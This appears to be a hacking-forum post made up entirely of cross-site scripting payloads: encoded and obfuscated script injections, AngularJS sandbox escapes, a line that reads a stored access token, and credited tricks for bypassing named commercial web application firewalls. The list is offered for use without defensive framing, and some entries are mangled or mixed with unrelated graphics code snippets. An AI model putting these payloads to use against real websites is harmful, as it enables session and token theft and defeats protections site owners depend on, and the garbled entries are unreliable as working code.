Hobby
256

test






  04-Jan-2023 01:11:20



/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/=alert()//>\x3e
{{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(document.domain)//’);}} )
{{constructor.constructor('alert(1)')()}}                          
{{this.construct.construct('alert("foo")')()}}
alert(localStorage.getItem('access_token'))   
asdf%22%20\=alert`1`;%             
asdf%22;alert`1`;//                           
<img src=x>’”${7*7}                           
<svg%0Aonauxclick=0;[1].some(confirm)//        
[img]http://server/x.jpg"=="//google.com[/img]         
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();                                  
//%250athrow%20on{err}o}r=a{ler}t,1337                   
<body/=foo=[123,666,999]>               
"/=(alert)(1)//                        
<object/data="/**/(document.domain)">//                     
'\141\154\145\162\164\50\61\51'instanceof{[Symbol.hasInstance]:eval}             
<style>@im\\port'\\ja\\vasc\\ript:alert(\\\"XSS"\\\")';</style>                  
%3Cx/Onpointerrawupdate=confirm%26lpar;)%3Exxxxx                                  
<svg id=alert(1337) =eval(id)>                                             
<svg id=(1337) =location=id>                               
[]?.findIndex?.(dump)+('<input =alert(1) autofocus>');                    
x=this?.[[]?.x??/a/.source+'\x6c'+13439..toString?.(30)],[1]?.findIndex?.(x);     
([]?.x??alert)(1);                                                    
Window.dump(alert(1))                         
<svg><x>alert&#40;7&#41</x>           
"><video><source =eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JIYXRIRWxlbWVudCgic2NyaXB0lik7YS5zcmM9Lmh0dHBzOi8vYXLkaW5ueXVudXMueHNzL>
1&quot;Style=&quot;position:fixed;top:0;left:0;font-size:999px;&quot;=&quot;(confirm)(1)&quot;                 
<Svg%K9=%7Krompt%6K1%6K>
-self[Object.keys(self)[6]] (document.d\u006Fmain)-
<svg ="alert(1)">
</title><!--><svg %3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1>#(document.domain)
%252522-alert%252528%252529-%252522
<form action="(document.domain)"><input type=submit>
%26apos;,alert%26lpar;1%26rpar;//
'-alert(1)'
"-alert(1)-"
<svg/=alert(1)//
<sVg/=alert(1)//
*/alert(1)/*
%253cscript%253ealert%25281%2529%253c%252fscript%253e
%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253e
" ="alert(1)" accesskey="x
alert(1)
" onx=[] =prompt(2)>
" onx={} =prompt(2)>
" onx=() =prompt(2)>
asdf‘-Function`self[‘a’\x2b’l’\x2b’e’\x2b’r’\x2b’t’]\x281\x29```-’ asdf `-
Function`self[‘a’+’l’+’e’+’r’+’t’](1)```-’
“}< svg&#x09;x/ =&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000100&#0000111&#0000099&#0000117&#0000109&#0000101&#0000110&#0000116&#0000046&#0000100&#0000111&#0000109&#0000097&#0000105&#0000110&#0000041>
“}%3c%25%30%30%73%76%67%26%23%78%30%39%3b%78%2f%25%30%30%6f%6e%6c%6f%61%64%3d%26%23%30%30%30%30%30%39%37%26%23%30%30%30%30%31%30%38%26%23%30%30%30%30%31%30%31%26%23%30%30%30%30%31%31%34%26%23%30%30%30%30%31%31%36%26%23%30%30%30%30%30%34%30%26%23%30%30%30%30%31%30%30%26%23%30%30%30%30%31%31%31%26%23%30%30%30%30%30%39%39%26%23%30%30%30%30%31%31%37%26%23%30%30%30%30%31%30%39%26%23%30%30%30%30%31%30%31%26%23%30%30%30%30%31%31%30%26%23%30%30%30%30%31%31%36%26%23%30%30%30%30%30%34%36%26%23%30%30%30%30%31%30%30%26%23%30%30%30%30%31%31%31%26%23%30%30%30%30%31%30%39%26%23%30%30%30%30%30%39%37%26%23%30%30%30%30%31%30%35%26%23%30%30%30%30%31%31%30%26%23%30%30%30%30%30%34%31%3e
”><iframe/src=javascript&colon;[document&period;domain].find(alert)>
"><a href=”javascript&colon;alert&lpar;document&period;domain&rpar;”>Click Here</a>
123%3Ca+href%3Djav%26%23x09%3Bascript%3Aprom%26%23x09%3Bpt%28doc%26%23x09%3Bument.coo%26%23x09%3Bkie%29%3B%3Easdasdas%3C%2Fa%3E
eyJuYW1lIjogIlRlc3QgSGFja2VyT25lIiwgInN0YXJ0X2RhdGUiOiAiMDEuMDEuMjAxOCIsICJsZWFucGx1bV9pZCI6ICJ0ZXN0IiwgInJpZGVzIjogIjIwMCIsICJwbGFjZXMiOiAiMjAiLCAiZGlzdGFuY2UiOiA1MDAsICJjYW5jZWxfdGltZXMiOiAiMCIsICJkYXlzIjogIjEwMCIsICJwcm9tb19jb2RlIjogImphdmFzY3JpcHQ6Ly9yLmdyYWIuY29tL3Rlc3QlMGFhbGVydChkb2N1bWVudC5kb21haW4pIiwgInByZl9yZXdhcmQiOiAiMTAifQ==
(atob(`PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`));
();
<div style="width:1000px;height:1000px" =alert()></div>
<marquee width=10 loop=2 behavior="alternate" =alert()>
<marquee =alert(1)>
<marquee loop=1 width=0 =alert(1)>
<input autofocus="" =alert(1)></input>
<details open ="alert()">
<video autoplay start="alert()" src=x></video>
<video autoplay controls ="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls eddata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls edmetadata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls start="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls start="alert()"><source src=x></video>
<video controls ="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<audio autoplay controls ="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<audio autoplay controls ing="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<style>@keyframes x {}</style><p style="animation: x;" ="alert()">XSS</p><p style="animation: x;" ="alert()">XSS</p>
<svg><animate =alert() attributeName=x></svg>
<object data="data:text/html,">
<iframe srcdoc="<svg >">
<object data=(3)>
<iframe src=(2)>
<embed src=(1)>
<embed src="PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<svg>alert(1)-%26apos%3B
anythinglr00alert(document.domain)uxldzanythinglr00%3c%2fscript%3e<object data='PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
<a href=javas&#99;ript:alert(1)>
%2sscript%2ualert()%2s/script%2u
<style>@KeyframeS x{}</style><xss style="animation-name:x" ="alert(1)"></xss>
<a/href="'earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
=alert&#x00000000028;1&#x00000000029; autofocus>
{{[''.constructor.prototype.charAt=[].join]|orderBy:'x=1} } };alert(1)//'}}
{{[''.constructor.prototype.charAt=[].join]|orderBy:'x=1} } };alert(1)//'}}
{{[]."-alert`1`-"}}
{{$on.constructor{'&bsol;&bsol;u&bsol;u007b61}lert`1`')()}}
<svg =prompt%26%230000000040document.domain)>
<svg =prompt%26%23x000000028;document.domain)>
X(S,D)I=ivec3(S);D=fract(float(I.x^I.y^I.z)*PI vec3 p;float d=1.,h,H;ivec3 I;for(;h<9.&&d>.9;){p=vec3((FC.xy-r)/r.y,1)*h+vec3(0,2,t);X(p*4.,H)*.9);d=p.y-pow(H,20.);h+=.01;}X(p*1e2,d)+t*.1);http://o.xyz=p*pow(d,1e2)+h/18.;
'alert(1)'.match({__proto__:RegExp.prototype,global:1,unicode:1,exec:eval})
<svg =alert%26%230000000040"1")>
w=t=640,draw=_=>{createCanvas(w,w);loadPixels() for(t++,q=y=w/4;y--;)for(x=q;x--;)(t-y-x^t-y+x)**sqrt(2)%33<(x+y)/19&&set(x,y,0) updatePixels();clear(g=get(0,0,q,q));image(g,0,0,w,w)}
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
<math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><style><a title="</style>"></style></h1>br>-->#"(1)
-->#"(1)
-->#"(1)
"><body/=prompt(1)>
"><a href="javasciript:throw 1337">
<\ "\/*'\/*></Title\/<\/Script\/--><svg\/**\/%3B =(alert)(1)\/\/>#asdf"}
"><Svg/=top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])>
"><Svg+Onx=()+=alert?.(domain)>
1\47\42\55\55\41\76\74Img\40Src\40\75confirm\140\113\140\76
1\'/[location=`Javas\x63ript:\x63onfirm\x60K\x60`]//
//%250Dtop.confirm(1)//?1
<Img Src=//X55.is =import(src)>
alert?.(document?.domain)[document?.domain]?.map?.(alert)
top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])
%EF%BC%9C/script%ef%bc%9e%EF%BC%9Cscript%ef%bc%9econfirm%601%60%EF%BC%9C/script%ef%bc%9e
"><On click=prompt()>
"><img sr c=x o nerror=prompt()>
"><On mouseover=prompt()>
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!confirm(1)

@black0x00mamba | Bypass WAF Akamaighost & filtered , , href, src, , script, etc
<img  sr c=x o nerror=((pro mpt(1)))>

DotDefender WAF bypass by @0xInfection
<bleh/start=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in the wild):
<iframe/src=' '>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.

@daveysec | Was able to bypass Imperva Incapsula WAF with:
<svg \r\n=$.globalEval("al"+"ert()");>

@rodolfoassis | Wordfence 7.4.2
<a href=&#01(1)>

rodolfoassis | Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>

rodolfoassis | ModSecurity CRS 3.2.0 PL1
<a href="(1)">

*Beware click the link!


DISCUSSION
Nothing comment here :(
Login for report, comment and join discussion
Login Here
Sponsored

Popular Posts
Gps Tracker Seccodeid Free Too...
General
21322
204
Top


Djie sam soe Djie sam soe
Complete Basic Course in Kali...
Linux
14354
4
Top


Djie sam soe Djie sam soe
Komintod (Ministry of Communic...
Data Leak
6498
89
Top


Murtad methamphetamine Murtad methamphetamine
Free Proxy List
Networking
3618
3
Top


Sandidi Sandidi
Mass Reverse IP Unlimited
Tools Hacking
3383
13
Top


ImamWawe ImamWawe

Related Post

Youtube Video

Subscribe